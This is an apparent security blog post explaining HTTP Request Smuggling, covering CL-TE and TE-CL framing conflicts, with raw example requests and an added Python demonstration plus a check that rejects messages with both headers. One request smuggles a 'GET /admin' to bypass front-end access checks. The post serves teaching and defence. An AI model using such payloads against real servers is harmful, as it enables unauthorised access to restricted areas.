Let’s talk about HTTP Request Smuggling

Rodrigo Maia · Published in stolabs · Apr 26, 2021

HTTP Request Smuggling is a vulnerability that has existed since 2005. It exploits the way servers parse HTTP requests in order to obtain access or information that should not be accessible to the user.

Simply put, in an environment with multiple servers between the user and the target application, there are ways to craft requests that contain other requests, inducing the servers to give us what we want.

How does it work?

Take, for example, a simple request:

POST / HTTP/1.1
Host: test.com
Content-Length: 10

user=admin

When the server receives this request, it processes it and responds with the requested resource. But what if the server receives several requests at once?

POST / HTTP/1.1
Host: test.com
Content-Length: 10

user=admin

POST /users HTTP/1.1
Host: test.com
Content-Length: 8

role=dev

When several requests arrive on the same TCP connection, the server needs a way to delimit where each request begins and ends. One way is the “Content-Length” header, which gives the size of the request body in bytes.

POST / HTTP/1.1
Host: test.com
Content-Length: 10

user=admin

Another way to delimit the body is the header “Transfer-Encoding: chunked”, which splits the body into chunks, each preceded by its size in bytes (in hexadecimal), until the server finds a chunk of size 0.

For example:

POST / HTTP/1.1
Host: test.com
Transfer-Encoding: chunked

6
user=a
4
dmin
0


So, if we send both headers in the same request, we can induce different servers to treat different parts of the body as the request.

POST / HTTP/1.1
Host: test.com
Transfer-Encoding: chunked
Content-Length: 15

0

name=admin

Here the 0 marks the end of the chunked body, while the “Content-Length” header covers the whole body, including the trailing “name=admin”.

In network environments with Front End and Back End servers, each one can be configured to honour a different header. That is, if the Front End server uses the “Content-Length” header and the Back End server uses the “Transfer-Encoding” header, each one will read only the part of the body delimited by its own header. This lets us manipulate the servers and gain some advantage, such as an authentication bypass or access to restricted data.

So, using this technique, we can build something like the following (the Content-Length counts the whole body, with CRLF line endings):

POST / HTTP/1.1
Host: test.com
Transfer-Encoding: chunked
Content-Length: 79

9
user=test
0

GET /admin HTTP/1.1
Host: test.com
Content-Length: 5

x=

This way we gain access to an admin area that was previously forbidden. The Front End server processes the body according to its configured header, while the Back End server processes only the content delimited by its own header, responds to the smuggled request, and so bypasses the Front End’s access checks on the “/admin” path.

The most common variants of this attack are:

CL-TE: the Front End server uses the “Content-Length” header and the Back End server uses the “Transfer-Encoding” header.

TE-CL: the Front End server uses the “Transfer-Encoding” header and the Back End server uses the “Content-Length” header.

Of course, there are several ways to adapt the technique, depending on what you find on the target.
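To make the parsing discrepancy concrete, here is an added example (my own code, not the author’s): it frames one CL-TE request, modelled on the one above, first by Content-Length, as the Front End would, and then by Transfer-Encoding, as the Back End would, so that the first parser sees one request and the second sees two. It also includes the check a defensive proxy should apply: reject any message that carries both headers, as RFC 7230 recommends. The sample bytes and the parser functions are constructed for this illustration.

```python
# Constructed sample (not from the post): a CL-TE request carrying both framing
# headers. Content-Length: 79 covers the whole body, counted with CRLF endings.
RAW = (
    b"POST / HTTP/1.1\r\nHost: test.com\r\n"
    b"Transfer-Encoding: chunked\r\nContent-Length: 79\r\n\r\n"
    b"9\r\nuser=test\r\n0\r\n\r\n"
    b"GET /admin HTTP/1.1\r\nHost: test.com\r\nContent-Length: 5\r\n\r\nx="
)

def parse_head(buf):
    """Split one request head off buf -> (request line, lowercased headers, rest)."""
    head, _, rest = buf.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, rest

def body_by_cl(headers, rest):
    """Frame the body by Content-Length (the Front End's view in CL-TE)."""
    n = int(headers.get(b"content-length", b"0"))
    return rest[:n], rest[n:]

def body_by_te(rest):
    """Frame the body by chunked encoding (the Back End's view in CL-TE): read
    hex-sized chunks until the 0 chunk; whatever follows becomes the *next* request."""
    body = b""
    while True:
        size_line, _, rest = rest.partition(b"\r\n")
        size = int(size_line, 16)
        if size == 0:
            return body, rest[2:]      # skip the CRLF closing the last chunk
        body += rest[:size]
        rest = rest[size + 2:]         # chunk data plus its trailing CRLF

def split_requests(buf, framing):
    """Return the (request line, body) pairs a parser using "cl" or "te" framing sees."""
    requests = []
    while buf:
        line, headers, rest = parse_head(buf)
        chunked = headers.get(b"transfer-encoding", b"").lower() == b"chunked"
        if framing == "te" and chunked:
            body, buf = body_by_te(rest)
        else:                          # no chunked TE: fall back to Content-Length
            body, buf = body_by_cl(headers, rest)
        requests.append((line, body))
    return requests

def is_ambiguous(headers):
    """Defensive check (RFC 7230 s.3.3.3): reject a message with both CL and TE."""
    return b"content-length" in headers and b"transfer-encoding" in headers
```

Run with `split_requests(RAW, "cl")` and `split_requests(RAW, "te")` to see the one-versus-two request split; `is_ambiguous(parse_head(RAW)[1])` is what a hardened Front End would check before forwarding anything.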

There are also tools and plugins that can help you look for this vulnerability, such as the “HTTP Request Smuggler” extension for Burp Suite. It automates the search and gives the exploration a more reliable starting point. With its results, we can adjust the payloads to exploit the vulnerability.

This was just an overview of Request Smuggling, an “obscure” but very interesting technique.
